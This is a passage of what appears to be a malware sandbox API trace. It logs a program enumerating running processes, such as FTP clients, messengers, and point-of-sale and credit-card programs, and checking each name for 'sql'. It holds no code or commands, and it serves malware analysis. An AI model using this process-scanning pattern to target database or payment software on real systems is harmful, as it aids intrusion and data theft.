lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0114.199] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0114.199] StrStrIA (lpFirst="smartftp.exe", lpSrch="sql") returned 0x0 [0114.199] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0114.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.201] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35711c0 [0114.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x35711c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0114.201] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0114.201] StrStrIA (lpFirst="totalcmd.exe", lpSrch="sql") returned 0x0 [0114.201] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0114.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.202] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571298 [0114.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3571298, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0114.202] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0114.202] StrStrIA (lpFirst="trillian.exe", lpSrch="sql") returned 0x0 [0114.202] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0114.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.204] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571178 [0114.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3571178, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0114.204] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0114.204] StrStrIA (lpFirst="webdrive.exe", lpSrch="sql") returned 0x0 [0114.204] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0114.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.205] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571148 [0114.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x3571148, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0114.205] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0114.205] StrStrIA (lpFirst="whatsapp.exe", lpSrch="sql") returned 0x0 [0114.205] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0114.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.207] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35712c8 [0114.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x35712c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0114.207] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0114.207] StrStrIA (lpFirst="winscp.exe", lpSrch="sql") returned 0x0 [0114.207] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0114.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0114.209] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357fb20 [0114.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357fb20, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0114.209] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0114.209] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="sql") returned 0x0 [0114.209] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0114.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.210] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357fae0 [0114.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357fae0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0114.211] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0114.211] StrStrIA (lpFirst="active-charge.exe", lpSrch="sql") returned 0x0 [0114.211] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0114.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.212] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35710d0 [0114.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x35710d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0114.212] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0114.212] StrStrIA (lpFirst="accupos.exe", lpSrch="sql") returned 0x0 [0114.212] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0114.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.214] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35710e8 [0114.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x35710e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0114.214] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0114.214] StrStrIA (lpFirst="afr38.exe", lpSrch="sql") returned 0x0 [0114.214] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0114.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.215] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571190 [0114.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3571190, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0114.215] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0114.216] StrStrIA (lpFirst="aldelo.exe", lpSrch="sql") returned 0x0 [0114.216] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0114.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0114.217] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3571280 [0114.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3571280, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0114.217] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0114.217] StrStrIA (lpFirst="ccv_server.exe", lpSrch="sql") returned 0x0 [0114.217] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0114.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0114.219] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357fa60 [0114.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357fa60, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0114.219] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0114.219] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="sql") returned 0x0 [0114.219] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0114.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.221] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f900 [0114.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357f900, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0114.221] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0114.221] StrStrIA (lpFirst="creditservice.exe", lpSrch="sql") returned 0x0 [0114.221] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0114.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.378] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571208 [0114.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3571208, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0114.378] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0114.378] StrStrIA (lpFirst="edcsvr.exe", lpSrch="sql") returned 0x0 [0114.378] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0114.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.380] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571220 [0114.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3571220, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0114.380] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0114.380] StrStrIA (lpFirst="fpos.exe", lpSrch="sql") returned 0x0 [0114.380] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0114.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.381] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571250 [0114.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3571250, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0114.381] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0114.381] StrStrIA (lpFirst="isspos.exe", lpSrch="sql") returned 0x0 [0114.381] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0114.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0114.383] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357fa40 [0114.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357fa40, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0114.383] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0114.383] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="sql") returned 0x0 [0114.383] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0114.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.384] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35712b0 [0114.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x35712b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0114.384] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0114.384] StrStrIA (lpFirst="omnipos.exe", lpSrch="sql") returned 0x0 [0114.384] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0114.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.385] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35710a0 [0114.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x35710a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0114.386] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0114.386] StrStrIA (lpFirst="spcwin.exe", lpSrch="sql") returned 0x0 [0114.386] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0114.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.387] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357fb40 [0114.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357fb40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0114.387] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0114.387] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="sql") returned 0x0 [0114.387] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0114.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.388] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35712e0 [0114.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x35712e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0114.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0114.388] StrStrIA (lpFirst="utg2.exe", lpSrch="sql") returned 0x0 [0114.388] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0114.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.389] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571340 [0114.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3571340, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0114.389] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0114.390] StrStrIA (lpFirst="saying.exe", lpSrch="sql") returned 0x0 [0114.390] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0114.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.391] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35710b8 [0114.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x35710b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0114.391] lstrcpyA (in: lpString1=0x567fabc, 